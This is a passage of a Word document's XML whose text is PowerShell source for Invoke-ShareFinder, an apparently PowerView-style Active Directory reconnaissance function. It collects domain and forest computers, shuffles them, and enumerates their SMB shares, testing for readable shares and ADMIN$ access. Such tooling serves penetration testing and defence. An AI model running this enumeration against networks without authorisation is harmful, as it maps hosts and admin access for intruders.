    <w:p w14:paraId="42F84EE4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF74CA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C449BFB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F20A295" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="620A0305" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    begin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3522CF4D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($PSBoundParameters['Debug']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137799D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DebugPreference = 'Continue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E54760F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394211D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="36B235D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # random object for delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC8A523" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $RandNo = New-Object System.Random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457431B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="15A41904" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        Write-Verbose "[*] Running Invoke-ShareFinder with delay of $Delay"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536078A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3700B1F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # figure out the shares we want to ignore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B77B9D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String[]] $ExcludedShares = @('')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0E02B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5689ECCF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($ExcludePrint) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044E96FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ExcludedShares = $ExcludedShares + "PRINT$"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5603674A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9E53A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($ExcludeIPC) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FB27D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ExcludedShares = $ExcludedShares + "IPC$"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353479F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3936B851" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($ExcludeStandard) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0349C3E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ExcludedShares = @('', "ADMIN$", "IPC$", "C$", "PRINT$")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEC8161" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2C3CA1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0F1EEDE5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # if we're using a host file list, read the targets in and add them to the target list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309911FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($ComputerFile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B538EF7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ComputerName = Get-Content -Path $ComputerFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA09031" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC88862" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7124F69C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if(!$ComputerName) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3215A4CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [array]$ComputerName = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03601622" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="183DB8AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Domain) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E2594E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TargetDomains = @($Domain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1088CF5E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B880E4E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            elseif($SearchForest) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D99B946" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # get ALL the domains in the forest to search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D65A4D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F71DA51" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD14C55" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616A6345" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # use the local domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496F3AC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TargetDomains = @( (Get-NetDomain).name )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2F205D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F9667A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDD363B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach ($Domain in $TargetDomains) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04763C18" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "[*] Querying domain $Domain for hosts"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EC2335" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ComputerName += Get-NetComputer -Domain $Domain -DomainController $DomainController -Filter $ComputerFilter -ADSpath $ComputerADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0F94D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCD4410" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B8D262" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # remove any null target hosts, uniquify the list and shuffle it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226BD8C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E677E8B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($($ComputerName.count) -eq 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036E5BD6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                throw "No hosts found!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC5E334" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AA2027" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A03EF9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2C9CC940" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # script block that enumerates a server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E15A38" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $HostEnumBlock = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014ED224" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            param($ComputerName, $Ping, $CheckShareAccess, $ExcludedShares, $CheckAdmin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E0609B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="05E6F6A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # optionally check if the server is up first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08900EAD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Up = $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198FBF51" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Ping) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAB504E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59349DEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529B3B8D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            if($Up) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284881BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # get the shares for this host and check what we find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A6109F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Shares = Get-NetShare -ComputerName $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD858E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                ForEach ($Share in $Shares) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD6CDFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Write-Verbose "[*] Server share: $Share"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA939E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $NetName = $Share.shi1_netname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1F2869" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Remark = $Share.shi1_remark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5E27A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Path = '\\'+$ComputerName+'\'+$NetName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A23ED8A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3F5C7FA1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # make sure we get a real share name back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A991BAD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if (($NetName) -and ($NetName.trim() -ne '')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC7B408" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # if we're just checking for access to ADMIN$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E527E3C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        if($CheckAdmin) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC189C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            if($NetName.ToUpper() -eq "ADMIN$") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CF8A28" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F40BD4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $Null = [IO.Directory]::GetFiles($Path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0576A20E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    "\\$ComputerName\$NetName `t- $Remark"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3333A4FD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4D56B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3503F43C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    Write-Verbose "Error accessing path $Path : $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BD6827" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44518F83" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FB6B6F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535548CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # skip this share if it's in the exclude list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D6EB9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        elseif ($ExcludedShares -NotContains $NetName.ToUpper()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1519CBA4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            # see if we want to check access to this share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A611BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            if($CheckShareAccess) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13038496" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                # check if the user has access to this path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09022AD0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33312982" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                    $Null = [IO.Directory]::GetFiles($Path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00121FB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    "\\$ComputerName\$NetName `t- $Remark"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52569D5F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE017B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FA6C32" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    Write-Verbose "Error accessing path $Path : $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C159427" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E17BC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F565271" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA5881A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                "\\$ComputerName\$NetName `t- $Remark"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12631920" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC7A5A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2A1CDB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A1D1B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F6BF8F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1F8A44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E08512F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="601F42ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A57698C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7678E577" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1707FC9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="287312F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($Threads) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AA5D59" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Using threading with threads = $Threads"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCC0934" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="318A02FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # if we're using threading, kick off the script block with Invoke-ThreadedFunction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A13107" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ScriptParams = @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E284DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'Ping' = $(-not $NoPing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0F7896" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'CheckShareAccess' = $CheckShareAccess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6591E0B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'ExcludedShares' = $ExcludedShares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2866BE99" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'CheckAdmin' = $CheckAdmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AABF90" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
